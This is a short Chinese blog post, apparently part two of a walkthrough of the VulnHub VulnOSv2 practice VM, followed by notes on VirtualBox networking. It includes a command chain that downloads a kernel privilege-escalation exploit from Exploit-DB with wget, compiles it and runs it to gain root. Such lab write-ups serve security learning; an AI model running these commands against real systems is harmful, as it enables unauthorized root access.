vulnhub之VulnOSv2的实践(二)

上期中说到vulnhub之VulnOSv2的实践留了个尾巴,本期继续实践提权,

用webmin登录到系统后,whoami看不是root,当然就很多事儿干不了,

查看一下系统信息,

到网上搜一下这个内核版本有没有提权漏洞和利用,

最后这个就是,下载漏洞利用代码,wget https://www.exploit-db.com/download/37292,

编译出来可执行文件并提权,mv 37292 shell.c,gcc -o shell shell.c,./shell,

再whoami看就是root了,能干的事儿就多了。

说是字数不够不让发表,就再凑点儿,开始做今天这个实践的时候选择的还是hostonly网络,但是让能上公网的wifi网卡给hostonly网卡做了共享,也就让它改成了192.168.137.0/24网络,hostonly网卡的地址确实改成了192.168.137.1,但是启动虚机后发现分配到的还是192.168.56.0/24网络的地址,尝试了把hostonly网络的dhcp关掉以及把dhcp里的网络改成192.168.137.0/24,都无法让虚机分配到192.168.137.0/24网络的地址,看来virtualbox还是没有workstation易用的,为了完成今天这个实践,后来就不用hostonly网卡了,而是改成了桥接网卡,直接桥接到能上公网的wifi网卡上,虚机直接dhcp到可以上公网的地址。

  • 发表于:
  • 原文链接https://kuaibao.qq.com/s/20181014G10WOM00?refer=cp_1026
  • 腾讯「云+社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。
  • 如有侵权,请联系 yunjia_community@tencent.com 删除。

扫码关注云+社区

领取腾讯云代金券